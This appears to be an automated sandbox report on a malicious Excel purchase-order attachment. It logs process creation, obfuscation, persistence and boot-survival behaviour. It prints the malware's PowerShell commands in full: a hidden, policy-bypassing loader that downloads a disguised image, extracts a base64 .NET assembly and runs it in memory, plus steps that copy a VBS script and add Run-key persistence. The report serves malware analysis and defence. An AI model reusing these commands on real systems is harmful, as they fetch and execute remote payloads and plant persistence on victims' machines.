Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: xF3wienia PO2102559-1.xlsx Static file information: File size 2146106 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbGAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb99 source: powershell.exe, 00000008.00000002.446551677.000000000515E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256+ source: powershell.exe, 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.00000000041E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.00000000041E9000.00000004.00000800.00020000.00000000.sdmp
Source: xF3wienia PO2102559-1.xlsx Initial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00385BB6 push ebx; iretd 8_2_00385BC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00385BAB push ebx; iretd 8_2_00385BAD

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0356043D URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_0356043D

Boot Survival

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\word.vbs Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
